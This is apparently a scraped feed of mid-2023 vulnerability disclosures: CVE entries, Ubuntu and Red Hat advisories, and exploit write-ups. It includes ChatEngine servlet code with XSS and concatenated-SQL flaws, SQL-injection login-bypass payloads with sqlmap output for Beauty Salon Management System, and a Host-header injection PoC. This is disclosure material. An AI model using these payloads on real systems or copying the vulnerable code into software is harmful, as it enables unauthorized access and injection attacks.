An issue in Zimbra Collaboration ZCS v.8.8.15 and v.9.0 allows an attacker to execute arbitrary code via the sfdc_preauth.jsp component.

CVE-2023-29382: Security Center - Zimbra :: Tech Center

Cross Site Scripting (XSS) vulnerability in textMessage field in /src/chatbotapp/chatWindow.java in wliang6 ChatEngine commit fded8e710ad59f816867ad47d7fc4862f6502f3e, allows attackers to execute arbitrary code.

package chatbotapp; import java.io.IOException; import java.io.PrintWriter; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; /\*\* \* ChatBotApp \* @author Winnie Oct 11, 2016 \* chatWindow.java \*/ @WebServlet(urlPatterns = {"/chatWindow"}) public class chatWindow extends HttpServlet{ String username, tempName; HttpSession session; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ response.setContentType("text/html;charset=UTF-8"); try(PrintWriter out = response.getWriter()){ String message = request.getParameter("txtMsg"); String username = session.getAttribute("username").toString(); //request.getRequestDispatcher("/WEB-INF/lib/chatbox.jsp").forward(request, response); out.println("<html> <head> <body bgcolor=\\"#0099B8\\"\> <meta http-equiv=\\"Content-Type\\" content=\\"text/html; charset=UTF-8\\"\> <title>Chat Room</title> </head>"); out.println("<meta http-equiv=\\"Content-Type\\" content=\\"text/html; charset=UTF-8\\"\> <center>"); out.println("<h2>Hi "); out.println(username); out.println("<br> Welcome to Chat Engine "); out.println("</h2><br><hr>"); out.println(" <body>"); out.println(" <form name=\\"chatWindow\\" action=\\"chatWindow\\"\>"); out.println("Message: <input type=\\"text\\" name=\\"txtMsg\\" value=\\"\\" /><input type=\\"submit\\" value=\\"Send\\" name=\\"cmdSend\\"/>"); out.println("<br><br> <a href=\\"chatWindow\\"\>Refresh Chat Room</a>"); out.println("<br> <br>"); out.println("Messages in Chat Box:"); out.println("<br><br>"); out.println("<textarea readonly=\\"readonly\\" name=\\"textMessage\\" rows=\\"20\\" cols=\\"60\\"\>"); if(request.getParameter("txtMsg") != null){ try{ Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); java.sql.Connection con = DriverManager.getConnection("jdbc:derby:/Users/Winnie/MyDatabase;create=true", "", ""); Statement st = con.createStatement(); String sql = "insert into WEBCHATDATABASE.MYTABLE values ('"+username+"','"+message+"')"; st.executeUpdate(sql); st.execute("commit"); } catch(Exception e){ System.out.println(e.getMessage()); } } //Retrieve messages from database try{ Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); //driver java.sql.Connection con = DriverManager.getConnection("jdbc:derby:/Users/Winnie/MyDatabase;create=true", "", ""); Statement statement = con.createStatement(); ResultSet resultSet = statement.executeQuery("select \*from WEBCHATDATABASE.MYTABLE"); while(resultSet.next()){ String messages = resultSet.getString(1)+ " >> " + resultSet.getString(2); out.println(messages); } //statement.executeUpdate("TRUNCATE TABLE WEBCHATDATABASE.MYTABLE"); con.close(); } catch(Exception e){ System.out.println(e.getMessage()); } out.println("</textarea>"); out.println("<hr>"); out.println("</form>"); out.println("</body"); out.println("</html>"); } } @Override protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ session = request.getSession(); if(username != null){ tempName = username; } processRequest(request, response); } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ processRequest(request, response); } }

CVE-2023-30320: ChatEngine/src/chatbotapp/chatWindow.java at master · wliang6/ChatEngine

Cross Site Scripting (XSS) vulnerability in textMessage field in /src/chatbotapp/LoginServlet.java in wliang6 ChatEngine commit fded8e710ad59f816867ad47d7fc4862f6502f3e, allows attackers to execute arbitrary code.

package chatbotapp; import java.io.IOException; import java.io.PrintWriter; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; /\*\* \* ChatBotApp \* @author Winnie Oct 11, 2016 \* LoginServlet.java \*/ @WebServlet(urlPatterns = "/userLogin") public class LoginServlet extends HttpServlet{ public String username; HttpSession session; protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException{ response.setContentType("text/html;charset=UTF-8"); username = request.getParameter("username"); PrintWriter out = response.getWriter(); try{ session = request.getSession(); session.setAttribute("username", request.getParameter("username")); out.println("<html> <head> <body bgcolor=\\"#0099B8\\"\> <meta http-equiv=\\"Content-Type\\" content=\\"text/html; charset=UTF-8\\"\> <title>Chat Room</title> </head>"); out.println("<meta http-equiv=\\"Content-Type\\" content=\\"text/html; charset=UTF-8\\"\> <center>"); out.println("<h2>Hi "); out.println(username); out.println("<br> Welcome to Chat Engine "); out.println("</h2><br><hr>"); out.println(" <body>"); out.println(" <form name=\\"chatWindow\\" action=\\"chatWindow\\"\>"); out.println("Message: <input type=\\"text\\" name=\\"txtMsg\\" value=\\"\\" /><input type=\\"submit\\" value=\\"Send\\" name=\\"cmdSend\\"/>"); out.println("<br><br> <a href=\\"chatWindow\\"\>Refresh Chat Room</a>"); out.println("<br> <br>"); out.println("Messages in Chat Box:"); out.println("<br><br>"); out.println("<textarea readonly=\\"readonly\\" name=\\"textMessage\\" rows=\\"20\\" cols=\\"60\\"\>"); //Retrieve messages from database try{ Class.forName("org.apache.derby.jdbc.EmbeddedDriver"); //driver java.sql.Connection con = DriverManager.getConnection("jdbc:derby:/Users/Winnie/MyDatabase;create=true", "", ""); Statement statement = con.createStatement(); ResultSet resultSet = statement.executeQuery("select \*from WEBCHATDATABASE.MYTABLE"); while(resultSet.next()){ String messages = resultSet.getString(1)+ " >> " + resultSet.getString(2); out.println(messages); } //statement.executeUpdate("TRUNCATE TABLE WEBCHATDATABASE.MYTABLE"); con.close(); } catch(Exception e){ System.out.println(e.getMessage()); } out.println("</textarea>"); out.println("<hr>"); out.println("</form>"); out.println("</body"); out.println("</html>"); } catch(Exception e){ System.out.println(e); } } @Override protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html;charset=UTF-8"); request.getRequestDispatcher("/WEB-INF/lib/index.jsp").forward(request, response); } @Override protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { processRequest(request, response); } }

CVE-2023-30321: ChatEngine/src/chatbotapp/LoginServlet.java at fded8e710ad59f816867ad47d7fc4862f6502f3e · wliang6/ChatEngine

Beauty Salon Management System version 1.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: Beauty Salon Management System v1.0 - SQLi  
# Date of found: 04/07/2023  
# Exploit Author: Fatih Nacar  
# Version: V1.0  
# Tested on: Windows 10  
# Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/>  
# Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/  
# CWE: CWE-89

Vulnerability Description -

Beauty Salon Management System: V1.0, developed by Campcodes, has been  
found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability  
allows an attacker to manipulate login authentication with the SQL queries  
and bypass authentication. The system fails to properly validate  
user-supplied input in the username and password fields during the login  
process, enabling an attacker to inject malicious SQL code. By exploiting  
this vulnerability, an attacker can bypass authentication and gain  
unauthorized access to the system.

Steps to Reproduce -

The following steps outline the exploitation of the SQL Injection  
vulnerability in Beauty Salon Management System V1.0:

1. Open the admin login page by accessing the URL:  
http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php

2. In the username and password fields, insert the following SQL Injection  
payload shown inside brackets to bypass authentication for usename  
parameter:

{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In}

3.Execute the SQL Injection payload.

As a result of successful exploitation, the attacker gains unauthorized  
access to the system and is logged in with administrative privileges.

Sqlmap results:

POST parameter 'username' is vulnerable. Do you want to keep testing the  
others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 793  
HTTP(s) requests:

---

Parameter: username (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)

Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374  
ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign  
In

Type: time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--  
rvYF&password=test&login=Sign In

---

[15:58:56] [INFO] the back-end DBMS is MySQL

web application technology: PHP 8.2.4, Apache 2.4.56

back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

Beauty Salon Management System 1.0 SQL Injection

Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.

**Apache Any23 vulnerable to excessive memory usage**

Moderate severity GitHub Reviewed Published Jul 5, 2023 to the GitHub Advisory Database • Updated Jul 6, 2023

GHSA-2gpr-j5vj-wvh2: Apache Any23 vulnerable to excessive memory usage

** UNSUPPORTED WHEN ASSIGNED ** Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-34150

Ubuntu Security Notice 6199-1 - It was discovered that PHP incorrectly handled certain Digest authentication for SOAP. An attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6199-1  
July 03, 2023

php7.4, php8.1 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

PHP could be made to expose sensitive information.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain Digest  
authentication for SOAP. An attacker could possibly use this issue  
to expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libapache2-mod-php7.4           8.1.12-1ubuntu4.2  
  libapache2-mod-php8.0           8.1.12-1ubuntu4.2  
  libapache2-mod-php8.1           8.1.12-1ubuntu4.2  
  php8.1                          8.1.12-1ubuntu4.2  
  php8.1-cgi                      8.1.12-1ubuntu4.2  
  php8.1-cli                      8.1.12-1ubuntu4.2  
  php8.1-soap                     8.1.12-1ubuntu4.2

Ubuntu 22.10:  
  libapache2-mod-php7.4           8.1.7-1ubuntu3.5  
  libapache2-mod-php8.0           8.1.7-1ubuntu3.5  
  libapache2-mod-php8.1           8.1.7-1ubuntu3.5  
  php8.1                          8.1.7-1ubuntu3.5  
  php8.1-cgi                      8.1.7-1ubuntu3.5  
  php8.1-cli                      8.1.7-1ubuntu3.5  
  php8.1-soap                     8.1.7-1ubuntu3.5

Ubuntu 22.04 LTS:  
  libapache2-mod-php7.4           8.1.2-1ubuntu2.13  
  libapache2-mod-php8.0           8.1.2-1ubuntu2.13  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.13  
  php8.1                          8.1.2-1ubuntu2.13  
  php8.1-cgi                      8.1.2-1ubuntu2.13  
  php8.1-cli                      8.1.2-1ubuntu2.13  
  php8.1-soap                     8.1.2-1ubuntu2.13  
  php8.1-sqlite3                  8.1.2-1ubuntu2.13

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.19  
  php7.4                          7.4.3-4ubuntu2.19  
  php7.4-cgi                      7.4.3-4ubuntu2.19  
  php7.4-cli                      7.4.3-4ubuntu2.19  
  php7.4-soap                     7.4.3-4ubuntu2.19

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6199-1  
  CVE-2023-3247

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.12-1ubuntu4.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.5  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.13  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.19

Ubuntu Security Notice USN-6199-1

A vulnerability was found in quarkus-core. This vulnerability occurs because the TLS protocol configured with quarkus.http.ssl.protocols is not enforced, and the client can force the selection of the weaker supported TLS protocol.

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-06-29

Updated:

2023-06-29

**RHSA-2023:3809 - Security Advisory**

*   Overview

**Synopsis**

Moderate: Red Hat build of Quarkus 2.13.8 release and security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

An update is now available for Red Hat build of Quarkus. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.

**Description**

This release of Red Hat build of Quarkus 2.13.8 includes security updates, bug  
fixes, and enhancements. For more information, see the release notes page listed in the References section.  

Security Fixes:  

*   CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray \[quarkus-2\]
*   CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks \[quarkus-2\]
*   CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption \[quarkus-2\]
*   CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow \[quarkus-2\]
*   CVE-2023-0482 RESTEasy: creation of insecure temp files \[quarkus-2\]
*   CVE-2022-3782 keycloak: path traversal via double URL encoding \[quarkus-2\]
*   CVE-2023-0481 io.quarkus-quarkus-parent: quarkus: insecure permissions on temp files \[quarkus-2\]
*   CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider \[quarkus-2\]

For more information about the security issues, including the impact, a CVSS  
score, acknowledgments, and other related information, see the CVE links listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat Build of Quarkus Text-Only Advisories x86\_64

**Fixes**

*   BZ - 2158916 - CVE-2022-45787 apache-james-mime4j: Temporary File Information Disclosure in MIME4J TempFileStorageProvider
*   BZ - 2163533 - CVE-2023-0481 quarkus: insecure permissions on temp files
*   BZ - 2166004 - CVE-2023-0482 RESTEasy: creation of insecure temp files
*   BZ - 2174854 - CVE-2023-26053 gradle: usage of long IDs for PGP keys is unsafe and is subject to collision attacks
*   BZ - 2180886 - CVE-2023-1584 quarkus-oidc: ID and access tokens leak via the authorization code flow
*   BZ - 2181977 - CVE-2023-28867 graphql-java: crafted GraphQL query causes stack consumption
*   BZ - 2182788 - CVE-2023-1436 jettison: Uncontrolled Recursion in JSONArray
*   BZ - 2211026 - CVE-2023-2974 quarkus-core: TLS protocol configured with quarkus.http.ssl.protocols is not enforced, client can enforce weaker supported TLS protocol
*   QUARKUS-2672 - Infinispan client is not aligned with newly released Red Hat Data Grid 8.4
*   QUARKUS-2787 - Rest Data Panache: Correct Open API integration
*   QUARKUS-2846 - Ensure that new line chars don't break Panache projection
*   QUARKUS-2978 - ExceptionMapper<WebApplicationException> is not working in DEV mode
*   QUARKUS-3158 - Do not create session and PKCE encryption keys if only bearer tokens are expected
*   QUARKUS-3159 - 2.13: Do not support any Origin by default if CORS is enabled
*   QUARKUS-3161 - Fix security-csrf-prevention.adoc
*   QUARKUS-3164 - Logging with Panache: fix LocalVariablesSorter usage
*   QUARKUS-3167 - Make SDKMAN releases minor for maintenance and preview releases
*   QUARKUS-3168 - Backport Ensure that ConfigBuilder classes work in native mode to 2.13
*   QUARKUS-3169 - New home for Narayana LRA coordinator Docker images
*   QUARKUS-3170 - Fix truststore REST Client config when password is not set
*   QUARKUS-3173 - Reinitialize sun.security.pkcs11.P11Util at runtime
*   QUARKUS-3174 - Prevent SSE writing from potentially causing accumulation of headers
*   QUARKUS-3175 - Filter out RESTEasy related warning in ProviderConfigInjectionWarningsTest
*   QUARKUS-3176 - Make sure parent modules are loaded into workspace before those that depend on them
*   QUARKUS-3177 - Fix copy paste error in qute docs
*   QUARKUS-3178 - Pass \`--userns=keep-id\` to podman only when in rootless mode
*   QUARKUS-3179 - Fix stuck HTTP2 request when sent challenge has resumed request
*   QUARKUS-3181 - Make sure quarkus:go-offline properly supports test scoped dependencies
*   QUARKUS-3184 - Use SchemaType.ARRAY instead of "ARRAY" for native support
*   QUARKUS-3185 - Simplify logic in create-app.adoc and allow to define stream
*   QUARKUS-3187 - Allow context propagation for OpenTelemetry
*   QUARKUS-3188 - Fix RestAssured URL handling and unexpected restarts in QuarkusProdModeTest
*   QUARKUS-3191 - Drop ':z' bind option when using MacOS and Podman
*   QUARKUS-3194 - Exclude Netty's reflection configuration files
*   QUARKUS-3195 - Integrate the api dependency from Infinispan 14 (#ISPN-14268)
*   QUARKUS-3205 - Missing JARs and other discrepancies related to xpp3 dependency in 2.13.8.

**CVEs**

*   CVE-2022-45787
*   CVE-2023-0481
*   CVE-2023-0482
*   CVE-2023-1436
*   CVE-2023-1584
*   CVE-2023-2974
*   CVE-2023-26053
*   CVE-2023-28867

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://access.redhat.com/documentation/en-us/red\_hat\_build\_of\_quarkus/2.13/
*   https://access.redhat.com/articles/4966181

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-2974

ApPHP MicroCMS version 1.0.1 re-embeds arbitrary content from the client into web pages.

====================================================================================================================================  
| # Title     : ApPHP MicroCMS v1.0.1 Host header attack Vulnerability                                                             |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro)                                                                                        |  
| # Vendor    : http://www.apphp.com/php-microcms/                                                                                 |    
| # Dork      : ApPHP MicroCMS © ApPHP Admin Login                                                                                 |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine

[+] Vulnerability description :

    An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways.   
    Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP).   
    Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to:   
    <link href="http://_SERVER['HOST']"    (Joomla)  
    ...and append secret keys and tokens to links containing it:   
    <a href="http://_SERVER['HOST']?token=topsecret">  (Django, Gallery, others)  
    ....and even directly import scripts from it:   
    <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4">  (Various)

    [+] This vulnerability affects : /phpmicrocms/index.php. 

[+] Attack details : 

    Host header evilhostK8kAwlbV.com was reflected inside a A tag (href attribute).

[+] The impact of this vulnerability :

    An attacker can manipulate the Host header as seen by the web application and cause the application to behave in unexpected ways.

[+] How to fix this vulnerability :

    The web application should use the SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. Consult references for detailed information.

====Greetings to :=========================================================================================================================  
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |  
===========================================================================================================================================

ApPHP MicroCMS 1.0.1 Host Header Injection

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Hive Provider.
This issue affects Apache Airflow Apache Hive Provider: before 6.1.1.

Before version 6.1.1 it was possible to bypass the security check to RCE via
principal parameter. For this to be exploited it requires access to modifying the connection details.

It is recommended updating provider version to 6.1.1 in order to avoid this vulnerability.



**Apache Airflow Hive Provider Beeline remote code execution with Principal**

Moderate severity GitHub Reviewed Published Jul 3, 2023 to the GitHub Advisory Database • Updated Jul 5, 2023

Tag

#apache